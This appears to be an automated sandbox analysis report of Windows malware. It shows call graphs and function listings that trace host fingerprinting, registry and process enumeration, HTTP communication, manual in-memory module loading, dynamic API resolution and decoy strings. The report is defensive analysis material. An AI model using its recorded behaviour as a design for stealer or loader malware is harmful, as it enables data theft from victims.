lstrcpy 14958->14959 14960 3c1c5f 14959->14960 14961 3ca9b0 4 API calls 14960->14961 14962 3c1c80 14961->14962 14963 3ca8a0 lstrcpy 14962->14963 14964 3c1c89 14963->14964 15663 3c77c0 GetCurrentProcess IsWow64Process 14964->15663 14967 3ca9b0 4 API calls 14968 3c1ca9 14967->14968 14969 3ca8a0 lstrcpy 14968->14969 14970 3c1cb2 14969->14970 14971 3ca9b0 4 API calls 14970->14971 14972 3c1cd1 14971->14972 14973 3ca8a0 lstrcpy 14972->14973 14974 3c1cda 14973->14974 14975 3ca9b0 4 API calls 14974->14975 14976 3c1cfb 14975->14976 14977 3ca8a0 lstrcpy 14976->14977 14978 3c1d04 14977->14978 14979 3c7850 3 API calls 14978->14979 14980 3c1d14 14979->14980 14981 3ca9b0 4 API calls 14980->14981 14982 3c1d24 14981->14982 14983 3ca8a0 lstrcpy 14982->14983 14984 3c1d2d 14983->14984 14985 3ca9b0 4 API calls 14984->14985 14986 3c1d4c 14985->14986 14987 3ca8a0 lstrcpy 14986->14987 14988 3c1d55 14987->14988 14989 3ca9b0 4 API calls 14988->14989 14990 3c1d75 14989->14990 14991 3ca8a0 lstrcpy 14990->14991 14992 3c1d7e 14991->14992 14993 3c78e0 3 API calls 14992->14993 14994 3c1d8e 14993->14994 14995 3ca9b0 4 API calls 14994->14995 14996 3c1d9e 14995->14996 14997 3ca8a0 lstrcpy 14996->14997 14998 3c1da7 14997->14998 14999 3ca9b0 4 API calls 14998->14999 15000 3c1dc6 14999->15000 15001 3ca8a0 lstrcpy 15000->15001 15002 3c1dcf 15001->15002 15003 3ca9b0 4 API calls 15002->15003 15004 3c1df0 15003->15004 15005 3ca8a0 lstrcpy 15004->15005 15006 3c1df9 15005->15006 15665 3c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15006->15665 15009 3ca9b0 4 API calls 15010 3c1e19 15009->15010 15011 3ca8a0 lstrcpy 15010->15011 15012 3c1e22 15011->15012 15013 3ca9b0 4 API calls 15012->15013 15014 3c1e41 15013->15014 15015 3ca8a0 lstrcpy 15014->15015 15016 3c1e4a 15015->15016 15017 3ca9b0 4 API calls 15016->15017 15018 3c1e6b 15017->15018 15019 3ca8a0 lstrcpy 15018->15019 15020 3c1e74 15019->15020 15667 3c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15020->15667 15023 3ca9b0 4 API calls 15024 3c1e94 15023->15024 15025 3ca8a0 lstrcpy 15024->15025 15026 3c1e9d 15025->15026 15027 3ca9b0 4 API calls 15026->15027 15028 3c1ebc 15027->15028 15029 3ca8a0 lstrcpy 15028->15029 15030 3c1ec5 15029->15030 15031 3ca9b0 4 API calls 15030->15031 15032 3c1ee5 15031->15032 15033 3ca8a0 lstrcpy 15032->15033 15034 3c1eee 15033->15034 15670 3c7b00 GetUserDefaultLocaleName 15034->15670 15037 3ca9b0 4 API calls 15038 3c1f0e 15037->15038 15039 3ca8a0 lstrcpy 15038->15039 15040 3c1f17 15039->15040 15041 3ca9b0 4 API calls 15040->15041 15042 3c1f36 15041->15042 15043 3ca8a0 lstrcpy 15042->15043 15044 3c1f3f 15043->15044 15045 3ca9b0 4 API calls 15044->15045 15046 3c1f60 15045->15046 15047 3ca8a0 lstrcpy 15046->15047 15048 3c1f69 15047->15048 15674 3c7b90 15048->15674 15050 3c1f80 15051 3ca920 3 API calls 15050->15051 15052 3c1f93 15051->15052 15053 3ca8a0 lstrcpy 15052->15053 15054 3c1f9c 15053->15054 15055 3ca9b0 4 API calls 15054->15055 15056 3c1fc6 15055->15056 15057 3ca8a0 lstrcpy 15056->15057 15058 3c1fcf 15057->15058 15059 3ca9b0 4 API calls 15058->15059 15060 3c1fef 15059->15060 15061 3ca8a0 lstrcpy 15060->15061 15062 3c1ff8 15061->15062 15686 3c7d80 GetSystemPowerStatus 15062->15686 15065 3ca9b0 4 API calls 15066 3c2018 15065->15066 15067 3ca8a0 lstrcpy 15066->15067 15068 3c2021 15067->15068 15069 3ca9b0 4 API calls 15068->15069 15070 3c2040 15069->15070 15071 3ca8a0 lstrcpy 15070->15071 15072 3c2049 15071->15072 15073 3ca9b0 4 API calls 15072->15073 15074 3c206a 15073->15074 15075 3ca8a0 lstrcpy 15074->15075 15076 3c2073 15075->15076 15077 3c207e GetCurrentProcessId 15076->15077 15688 3c9470 OpenProcess 15077->15688 15080 3ca920 3 API calls 15081 3c20a4 15080->15081 15082 3ca8a0 lstrcpy 15081->15082 15083 3c20ad 15082->15083 15084 3ca9b0 4 API calls 15083->15084 15085 3c20d7 15084->15085 15086 3ca8a0 lstrcpy 15085->15086 15087 3c20e0 15086->15087 15088 3ca9b0 4 API calls 15087->15088 15089 3c2100 15088->15089 15090 3ca8a0 lstrcpy 15089->15090 15091 3c2109 15090->15091 15693 3c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15091->15693 15094 3ca9b0 4 API calls 15095 3c2129 15094->15095 15096 3ca8a0 lstrcpy 15095->15096 15097 3c2132 15096->15097 15098 3ca9b0 4 API calls 15097->15098 15099 3c2151 15098->15099 15100 3ca8a0 lstrcpy 15099->15100 15101 3c215a 15100->15101 15102 3ca9b0 4 API calls 15101->15102 15103 3c217b 15102->15103 15104 3ca8a0 lstrcpy 15103->15104 15105 3c2184 15104->15105 15697 3c7f60 15105->15697 15108 3ca9b0 4 API calls 15109 3c21a4 15108->15109 15110 3ca8a0 lstrcpy 15109->15110 15111 3c21ad 15110->15111 15112 3ca9b0 4 API calls 15111->15112 15113 3c21cc 15112->15113 15114 3ca8a0 lstrcpy 15113->15114 15115 3c21d5 15114->15115 15116 3ca9b0 4 API calls 15115->15116 15117 3c21f6 15116->15117 15118 3ca8a0 lstrcpy 15117->15118 15119 3c21ff 15118->15119 15710 3c7ed0 GetSystemInfo wsprintfA 15119->15710 15122 3ca9b0 4 API calls 15123 3c221f 15122->15123 15124 3ca8a0 lstrcpy 15123->15124 15125 3c2228 15124->15125 15126 3ca9b0 4 API calls 15125->15126 15127 3c2247 15126->15127 15128 3ca8a0 lstrcpy 15127->15128 15129 3c2250 15128->15129 15130 3ca9b0 4 API calls 15129->15130 15131 3c2270 15130->15131 15132 3ca8a0 lstrcpy 15131->15132 15133 3c2279 15132->15133 15712 3c8100 GetProcessHeap RtlAllocateHeap 15133->15712 15136 3ca9b0 4 API calls 15137 3c2299 15136->15137 15138 3ca8a0 lstrcpy 15137->15138 15139 3c22a2 15138->15139 15140 3ca9b0 4 API calls 15139->15140 15141 3c22c1 15140->15141 15142 3ca8a0 lstrcpy 15141->15142 15143 3c22ca 15142->15143 15144 3ca9b0 4 API calls 15143->15144 15145 3c22eb 15144->15145 15146 3ca8a0 lstrcpy 15145->15146 15147 3c22f4 15146->15147 15718 3c87c0 15147->15718 15150 3ca920 3 API calls 15151 3c231e 15150->15151 15152 3ca8a0 lstrcpy 15151->15152 15153 3c2327 15152->15153 15154 3ca9b0 4 API calls 15153->15154 15155 3c2351 15154->15155 15156 3ca8a0 lstrcpy 15155->15156 15157 3c235a 15156->15157 15158 3ca9b0 4 API calls 15157->15158 15159 3c237a 15158->15159 15160 3ca8a0 lstrcpy 15159->15160 15161 3c2383 15160->15161 15162 3ca9b0 4 API calls 15161->15162 15163 3c23a2 15162->15163 15164 3ca8a0 lstrcpy 15163->15164 15165 3c23ab 15164->15165 15723 3c81f0 15165->15723 15167 3c23c2 15168 3ca920 3 API calls 15167->15168 15169 3c23d5 15168->15169 15170 3ca8a0 lstrcpy 15169->15170 15171 3c23de 15170->15171 15172 3ca9b0 4 API calls 15171->15172 15173 3c240a 15172->15173 15174 3ca8a0 lstrcpy 15173->15174 15175 3c2413 15174->15175 15176 3ca9b0 4 API calls 15175->15176 15177 3c2432 15176->15177 15178 3ca8a0 lstrcpy 15177->15178 15179 3c243b 15178->15179 15180 3ca9b0 4 API calls 15179->15180 15181 3c245c 15180->15181 15182 3ca8a0 lstrcpy 15181->15182 15183 3c2465 15182->15183 15184 3ca9b0 4 API calls 15183->15184 15185 3c2484 15184->15185 15186 3ca8a0 lstrcpy 15185->15186 15187 3c248d 15186->15187 15188 3ca9b0 4 API calls 15187->15188 15189 3c24ae 15188->15189 15190 3ca8a0 lstrcpy 15189->15190 15191 3c24b7 15190->15191 15731 3c8320 15191->15731 15193 3c24d3 15194 3ca920 3 API calls 15193->15194 15195 3c24e6 15194->15195 15196 3ca8a0 lstrcpy 15195->15196 15197 3c24ef 15196->15197 15198 3ca9b0 4 API calls 15197->15198 15199 3c2519 15198->15199 15200 3ca8a0 lstrcpy 15199->15200 15201 3c2522 15200->15201 15202 3ca9b0 4 API calls 15201->15202 15203 3c2543 15202->15203 15204 3ca8a0 lstrcpy 15203->15204 15205 3c254c 15204->15205 15206 3c8320 17 API calls 15205->15206 15207 3c2568 15206->15207 15208 3ca920 3 API calls 15207->15208 15209 3c257b 15208->15209 15210 3ca8a0 lstrcpy 15209->15210 15211 3c2584 15210->15211 15212 3ca9b0 4 API calls 15211->15212 15213 3c25ae 15212->15213 15214 3ca8a0 lstrcpy 15213->15214 15215 3c25b7 15214->15215 15216 3ca9b0 4 API calls 15215->15216 15217 3c25d6 15216->15217 15218 3ca8a0 lstrcpy 15217->15218 15219 3c25df 15218->15219 15220 3ca9b0 4 API calls 15219->15220 15221 3c2600 15220->15221 15222 3ca8a0 lstrcpy 15221->15222 15223 3c2609 15222->15223 15767 3c8680 15223->15767 15225 3c2620 15226 3ca920 3 API calls 15225->15226 15227 3c2633 15226->15227 15228 3ca8a0 lstrcpy 15227->15228 15229 3c263c 15228->15229 15230 3c265a lstrlen 15229->15230 15231 3c266a 15230->15231 15232 3ca740 lstrcpy 15231->15232 15233 3c267c 15232->15233 15234 3b1590 lstrcpy 15233->15234 15235 3c268d 15234->15235 15777 3c5190 15235->15777 15237 3c2699 15237->13669 15965 3caad0 15238->15965 15240 3b5009 InternetOpenUrlA 15244 3b5021 15240->15244 15241 3b502a InternetReadFile 15241->15244 15242 3b50a0 InternetCloseHandle InternetCloseHandle 15243 3b50ec 15242->15243 15243->13673 15244->15241 15244->15242 15966 3b98d0 15245->15966 15247 3c0759 15248 3c077d 15247->15248 15249 3c0a38 15247->15249 15251 3c0799 StrCmpCA 15248->15251 15250 3b1590 lstrcpy 15249->15250 15252 3c0a49 15250->15252 15253 3c07a8 15251->15253 15254 3c0843 15251->15254 16142 3c0250 15252->16142 15256 3ca7a0 lstrcpy 15253->15256 15258 3c0865 StrCmpCA 15254->15258 15259 3c07c3 15256->15259 15260 3c0874 15258->15260 15297 3c096b 15258->15297 15261 3b1590 lstrcpy 15259->15261 15262 3ca740 lstrcpy 15260->15262 15263 3c080c 15261->15263 15265 3c0881 15262->15265 15266 3ca7a0 lstrcpy 15263->15266 15264 3c099c StrCmpCA 15267 3c09ab 15264->15267 15286 3c0a2d 15264->15286 15268 3ca9b0 4 API calls 15265->15268 15269 3c0823 15266->15269 15270 3b1590 lstrcpy 15267->15270 15271 3c08ac 15268->15271 15272 3ca7a0 lstrcpy 15269->15272 15273 3c09f4 15270->15273 15274 3ca920 3 API calls 15271->15274 15275 3c083e 15272->15275 15276 3ca7a0 lstrcpy 15273->15276 15277 3c08b3 15274->15277 15969 3bfb00 15275->15969 15279 3c0a0d 15276->15279 15280 3ca9b0 4 API calls 15277->15280 15281 3ca7a0 lstrcpy 15279->15281 15282 3c08ba 15280->15282 15283 3c0a28 15281->15283 15284 3ca8a0 lstrcpy 15282->15284 16085 3c0030 15283->16085 15286->13677 15297->15264 15617 3ca7a0 lstrcpy 15616->15617 15618 3b1683 15617->15618 15619 3ca7a0 lstrcpy 15618->15619 15620 3b1695 15619->15620 15621 3ca7a0 lstrcpy 15620->15621 15622 3b16a7 15621->15622 15623 3ca7a0 lstrcpy 15622->15623 15624 3b15a3 15623->15624 15624->14500 15626 3b47c6 15625->15626 15627 3b4838 lstrlen 15626->15627 15651 3caad0 15627->15651 15629 3b4848 InternetCrackUrlA 15630 3b4867 15629->15630 15630->14577 15632 3ca740 lstrcpy 15631->15632 15633 3c8b74 15632->15633 15634 3ca740 lstrcpy 15633->15634 15635 3c8b82 GetSystemTime 15634->15635 15637 3c8b99 15635->15637 15636 3ca7a0 lstrcpy 15638 3c8bfc 15636->15638 15637->15636 15638->14592 15640 3ca931 15639->15640 15641 3ca988 15640->15641 15643 3ca968 lstrcpy lstrcat 15640->15643 15642 3ca7a0 lstrcpy 15641->15642 15644 3ca994 15642->15644 15643->15641 15644->14595 15645->14710 15647 3b4eee 15646->15647 15648 3b9af9 LocalAlloc 15646->15648 15647->14598 15647->14600 15648->15647 15649 3b9b14 CryptStringToBinaryA 15648->15649 15649->15647 15650 3b9b39 LocalFree 15649->15650 15650->15647 15651->15629 15652->14720 15653->14861 15654->14863 15655->14871 15784 3c77a0 15656->15784 15659 3c1c1e 15659->14953 15660 3c76c6 RegOpenKeyExA 15661 3c7704 RegCloseKey 15660->15661 15662 3c76e7 RegQueryValueExA 15660->15662 15661->15659 15662->15661 15664 3c1c99 15663->15664 15664->14967 15666 3c1e09 15665->15666 15666->15009 15668 3c7a9a wsprintfA 15667->15668 15669 3c1e84 15667->15669 15668->15669 15669->15023 15671 3c7b4d 15670->15671 15672 3c1efe 15670->15672 15791 3c8d20 LocalAlloc CharToOemW 15671->15791 15672->15037 15675 3ca740 lstrcpy 15674->15675 15676 3c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15675->15676 15684 3c7c25 15676->15684 15677 3c7d18 15679 3c7d1e LocalFree 15677->15679 15680 3c7d28 15677->15680 15678 3c7c46 GetLocaleInfoA 15678->15684 15679->15680 15681 3ca7a0 lstrcpy 15680->15681 15683 3c7d37 15681->15683 15682 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15682->15684 15683->15050 15684->15677 15684->15678 15684->15682 15685 3ca8a0 lstrcpy 15684->15685 15685->15684 15687 3c2008 15686->15687 15687->15065 15689 3c94b5 15688->15689 15690 3c9493 GetModuleFileNameExA CloseHandle 15688->15690 15691 3ca740 lstrcpy 15689->15691 15690->15689 15692 3c2091 15691->15692 15692->15080 15694 3c7e68 RegQueryValueExA 15693->15694 15695 3c2119 15693->15695 15696 3c7e8e RegCloseKey 15694->15696 15695->15094 15696->15695 15698 3c7fb9 GetLogicalProcessorInformationEx 15697->15698 15699 3c7fd8 GetLastError 15698->15699 15702 3c8029 15698->15702 15706 3c7fe3 15699->15706 15709 3c8022 15699->15709 15700 3c2194 15700->15108 15705 3c89f0 2 API calls 15702->15705 15704 3c89f0 2 API calls 15704->15700 15707 3c807b 15705->15707 15706->15698 15706->15700 15792 3c89f0 15706->15792 15795 3c8a10 GetProcessHeap RtlAllocateHeap 15706->15795 15708 3c8084 wsprintfA 15707->15708 15707->15709 15708->15700 15709->15700 15709->15704 15711 3c220f 15710->15711 15711->15122 15713 3c89b0 15712->15713 15714 3c814d GlobalMemoryStatusEx 15713->15714 15717 3c8163 15714->15717 15715 3c819b wsprintfA 15716 3c2289 15715->15716 15716->15136 15717->15715 15719 3c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15718->15719 15721 3ca740 lstrcpy 15719->15721 15722 3c230b 15721->15722 15722->15150 15724 3ca740 lstrcpy 15723->15724 15730 3c8229 15724->15730 15725 3c8263 15726 3ca7a0 lstrcpy 15725->15726 15728 3c82dc 15726->15728 15727 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15727->15730 15728->15167 15729 3ca8a0 lstrcpy 15729->15730 15730->15725 15730->15727 15730->15729 15732 3ca740 lstrcpy 15731->15732 15733 3c835c RegOpenKeyExA 15732->15733 15734 3c83ae 15733->15734 15735 3c83d0 15733->15735 15736 3ca7a0 lstrcpy 15734->15736 15737 3c83f8 RegEnumKeyExA 15735->15737 15738 3c8613 RegCloseKey 15735->15738 15748 3c83bd 15736->15748 15740 3c860e 15737->15740 15741 3c843f wsprintfA RegOpenKeyExA 15737->15741 15739 3ca7a0 lstrcpy 15738->15739 15739->15748 15740->15738 15742 3c8485 RegCloseKey RegCloseKey 15741->15742 15743 3c84c1 RegQueryValueExA 15741->15743 15746 3ca7a0 lstrcpy 15742->15746 15744 3c84fa lstrlen 15743->15744 15745 3c8601 RegCloseKey 15743->15745 15744->15745 15747 3c8510 15744->15747 15745->15740 15746->15748 15749 3ca9b0 4 API calls 15747->15749 15748->15193 15750 3c8527 15749->15750 15751 3ca8a0 lstrcpy 15750->15751 15752 3c8533 15751->15752 15753 3ca9b0 4 API calls 15752->15753 15754 3c8557 15753->15754 15755 3ca8a0 lstrcpy 15754->15755 15756 3c8563 15755->15756 15757 3c856e RegQueryValueExA 15756->15757 15757->15745 15758 3c85a3 15757->15758 15759 3ca9b0 4 API calls 15758->15759 15760 3c85ba 15759->15760 15761 3ca8a0 lstrcpy 15760->15761 15762 3c85c6 15761->15762 15763 3ca9b0 4 API calls 15762->15763 15764 3c85ea 15763->15764 15765 3ca8a0 lstrcpy 15764->15765 15766 3c85f6 15765->15766 15766->15745 15768 3ca740 lstrcpy 15767->15768 15769 3c86bc CreateToolhelp32Snapshot Process32First 15768->15769 15770 3c875d CloseHandle 15769->15770 15771 3c86e8 Process32Next 15769->15771 15772 3ca7a0 lstrcpy 15770->15772 15771->15770 15776 3c86fd 15771->15776 15774 3c8776 15772->15774 15773 3ca8a0 lstrcpy 15773->15776 15774->15225 15775 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15775->15776 15776->15771 15776->15773 15776->15775 15778 3ca7a0 lstrcpy 15777->15778 15779 3c51b5 15778->15779 15780 3b1590 lstrcpy 15779->15780 15781 3c51c6 15780->15781 15796 3b5100 15781->15796 15783 3c51cf 15783->15237 15787 3c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15784->15787 15786 3c76b9 15786->15659 15786->15660 15788 3c7765 RegQueryValueExA 15787->15788 15789 3c7780 RegCloseKey 15787->15789 15788->15789 15790 3c7793 15789->15790 15790->15786 15791->15672 15793 3c8a0c 15792->15793 15794 3c89f9 GetProcessHeap HeapFree 15792->15794 15793->15706 15794->15793 15795->15706 15797 3ca7a0 lstrcpy 15796->15797 15798 3b5119 15797->15798 15799 3b47b0 2 API calls 15798->15799 15800 3b5125 15799->15800 15956 3c8ea0 15800->15956 15802 3b5184 15803 3b5192 lstrlen 15802->15803 15804 3b51a5 15803->15804 15805 3c8ea0 4 API calls 15804->15805 15806 3b51b6 15805->15806 15807 3ca740 lstrcpy 15806->15807 15808 3b51c9 15807->15808 15809 3ca740 lstrcpy 15808->15809 15810 3b51d6 15809->15810 15811 3ca740 lstrcpy 15810->15811 15812 3b51e3 15811->15812 15813 3ca740 lstrcpy 15812->15813 15814 3b51f0 15813->15814 15815 3ca740 lstrcpy 15814->15815 15816 3b51fd InternetOpenA StrCmpCA 15815->15816 15817 3b522f 15816->15817 15818 3b58c4 InternetCloseHandle 15817->15818 15819 3c8b60 3 API calls 15817->15819 15825 3b58d9 codecvt 15818->15825 15820 3b524e 15819->15820 15821 3ca920 3 API calls 15820->15821 15822 3b5261 15821->15822 15823 3ca8a0 lstrcpy 15822->15823 15824 3b526a 15823->15824 15826 3ca9b0 4 API calls 15824->15826 15829 3ca7a0 lstrcpy 15825->15829 15827 3b52ab 15826->15827 15828 3ca920 3 API calls 15827->15828 15830 3b52b2 15828->15830 15836 3b5913 15829->15836 15831 3ca9b0 4 API calls 15830->15831 15832 3b52b9 15831->15832 15833 3ca8a0 lstrcpy 15832->15833 15834 3b52c2 15833->15834 15835 3ca9b0 4 API calls 15834->15835 15837 3b5303 15835->15837 15836->15783 15838 3ca920 3 API calls 15837->15838 15839 3b530a 15838->15839 15840 3ca8a0 lstrcpy 15839->15840 15841 3b5313 15840->15841 15842 3b5329 InternetConnectA 15841->15842 15842->15818 15843 3b5359 HttpOpenRequestA 15842->15843 15845 3b58b7 InternetCloseHandle 15843->15845 15846 3b53b7 15843->15846 15845->15818 15847 3ca9b0 4 API calls 15846->15847 15848 3b53cb 15847->15848 15849 3ca8a0 lstrcpy 15848->15849 15850 3b53d4 15849->15850 15851 3ca920 3 API calls 15850->15851 15852 3b53f2 15851->15852 15853 3ca8a0 lstrcpy 15852->15853 15854 3b53fb 15853->15854 15855 3ca9b0 4 API calls 15854->15855 15856 3b541a 15855->15856 15857 3ca8a0 lstrcpy 15856->15857 15858 3b5423 15857->15858 15859 3ca9b0 4 API calls 15858->15859 15860 3b5444 15859->15860 15861 3ca8a0 lstrcpy 15860->15861 15862 3b544d 15861->15862 15863 3ca9b0 4 API calls 15862->15863 15864 3b546e 15863->15864 15865 3ca8a0 lstrcpy 15864->15865 15957 3c8ead CryptBinaryToStringA 15956->15957 15961 3c8ea9 15956->15961 15958 3c8ece GetProcessHeap RtlAllocateHeap 15957->15958 15957->15961 15959 3c8ef4 codecvt 15958->15959 15958->15961 15960 3c8f05 CryptBinaryToStringA 15959->15960 15960->15961 15961->15802 15965->15240 16208 3b9880 15966->16208 15968 3b98e1 15968->15247 15970 3ca740 lstrcpy 15969->15970 15971 3bfb16 15970->15971 16143 3ca740 lstrcpy 16142->16143 16144 3c0266 16143->16144 16145 3c8de0 2 API calls 16144->16145 16146 3c027b 16145->16146 16147 3ca920 3 API calls 16146->16147 16148 3c028b 16147->16148 16149 3ca8a0 lstrcpy 16148->16149 16150 3c0294 16149->16150 16151 3ca9b0 4 API calls 16150->16151 16152 3c02b8 16151->16152 16209 3b988e 16208->16209 16212 3b6fb0 16209->16212 16211 3b98ad codecvt 16211->15968 16215 3b6d40 16212->16215 16216 3b6d63 16215->16216 16227 3b6d59 16215->16227 16216->16227 16229 3b6660 16216->16229 16218 3b6dbe 16218->16227 16235 3b69b0 16218->16235 16220 3b6e2a 16221 3b6ee6 VirtualFree 16220->16221 16223 3b6ef7 16220->16223 16220->16227 16221->16223 16222 3b6f41 16224 3c89f0 2 API calls 16222->16224 16222->16227 16223->16222 16225 3b6f38 16223->16225 16226 3b6f26 FreeLibrary 16223->16226 16224->16227 16228 3c89f0 2 API calls 16225->16228 16226->16223 16227->16211 16228->16222 16230 3b668f VirtualAlloc 16229->16230 16232 3b6730 16230->16232 16234 3b673c 16230->16234 16233 3b6743 VirtualAlloc 16232->16233 16232->16234 16233->16234 16234->16218 16236 3b69c9 16235->16236 16239 3b69d5 16235->16239 16237 3b6a09 LoadLibraryA 16236->16237 16236->16239 16238 3b6a32 16237->16238 16237->16239 16242 3b6ae0 16238->16242 16245 3c8a10 GetProcessHeap RtlAllocateHeap 16238->16245 16239->16220 16241 3b6ba8 GetProcAddress 16241->16239 16241->16242 16242->16239 16242->16241 16243 3c89f0 2 API calls 16243->16242 16244 3b6a8b 16244->16239 16244->16243 16245->16244

                            Executed Functions

                            Function 003C9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 3c9860-3c9874 call 3c9750 663 3c987a-3c9a8e call 3c9780 GetProcAddress * 21 660->663 664 3c9a93-3c9af2 LoadLibraryA * 5 660->664 663->664 666 3c9b0d-3c9b14 664->666 667 3c9af4-3c9b08 GetProcAddress 664->667 669 3c9b46-3c9b4d 666->669 670 3c9b16-3c9b41 GetProcAddress * 2 666->670 667->666 671 3c9b4f-3c9b63 GetProcAddress 669->671 672 3c9b68-3c9b6f 669->672 670->669 671->672 673 3c9b89-3c9b90 672->673 674 3c9b71-3c9b84 GetProcAddress 672->674 675 3c9bc1-3c9bc2 673->675 676 3c9b92-3c9bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01082368), ref: 003C98A1
                            • GetProcAddress.KERNEL32(74DD0000,01082308), ref: 003C98BA
                            • GetProcAddress.KERNEL32(74DD0000,010823C8), ref: 003C98D2
                            • GetProcAddress.KERNEL32(74DD0000,01082320), ref: 003C98EA
                            • GetProcAddress.KERNEL32(74DD0000,01082380), ref: 003C9903
                            • GetProcAddress.KERNEL32(74DD0000,01089208), ref: 003C991B
                            • GetProcAddress.KERNEL32(74DD0000,01075A50), ref: 003C9933
                            • GetProcAddress.KERNEL32(74DD0000,01075A10), ref: 003C994C
                            • GetProcAddress.KERNEL32(74DD0000,01082248), ref: 003C9964
                            • GetProcAddress.KERNEL32(74DD0000,010824B8), ref: 003C997C
                            • GetProcAddress.KERNEL32(74DD0000,01082218), ref: 003C9995
                            • GetProcAddress.KERNEL32(74DD0000,010824D0), ref: 003C99AD
                            • GetProcAddress.KERNEL32(74DD0000,010757D0), ref: 003C99C5
                            • GetProcAddress.KERNEL32(74DD0000,01082398), ref: 003C99DE
                            • GetProcAddress.KERNEL32(74DD0000,01082230), ref: 003C99F6
                            • GetProcAddress.KERNEL32(74DD0000,01075790), ref: 003C9A0E
                            • GetProcAddress.KERNEL32(74DD0000,010823B0), ref: 003C9A27
                            • GetProcAddress.KERNEL32(74DD0000,010823F8), ref: 003C9A3F
                            • GetProcAddress.KERNEL32(74DD0000,01075870), ref: 003C9A57
                            • GetProcAddress.KERNEL32(74DD0000,01082428), ref: 003C9A70
                            • GetProcAddress.KERNEL32(74DD0000,01075A90), ref: 003C9A88
                            • LoadLibraryA.KERNEL32(01082560,?,003C6A00), ref: 003C9A9A
                            • LoadLibraryA.KERNEL32(01082590,?,003C6A00), ref: 003C9AAB
                            • LoadLibraryA.KERNEL32(010825D8,?,003C6A00), ref: 003C9ABD
                            • LoadLibraryA.KERNEL32(01082578,?,003C6A00), ref: 003C9ACF
                            • LoadLibraryA.KERNEL32(01082548,?,003C6A00), ref: 003C9AE0
                            • GetProcAddress.KERNEL32(75A70000,01082518), ref: 003C9B02
                            • GetProcAddress.KERNEL32(75290000,010825A8), ref: 003C9B23
                            • GetProcAddress.KERNEL32(75290000,01082530), ref: 003C9B3B
                            • GetProcAddress.KERNEL32(75BD0000,010825C0), ref: 003C9B5D
                            • GetProcAddress.KERNEL32(75450000,01075950), ref: 003C9B7E
                            • GetProcAddress.KERNEL32(76E90000,01089188), ref: 003C9B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003C9BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 003C9BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                            • Instruction ID: 00f3c0dd61510ac6d8ed5fea76c9b61d48aa509f99cec28f37e5c4d9dd5a519e
                            • Opcode Fuzzy Hash: a8a1df9fc9d0da8d1f666f7e7fd202b69d5e23936aa3b7921b7fe9e679ed377c
                            • Instruction Fuzzy Hash: 9FA18DF5501241AFC308EFA9ED88E7637F9F768380704851AA60DC3224D77DA84AEB13
                            Function 003B45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 3b45c0-3b4695 RtlAllocateHeap 781 3b46a0-3b46a6 764->781 782 3b474f-3b47a9 VirtualProtect 781->782 783 3b46ac-3b474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003B460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003B479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4713
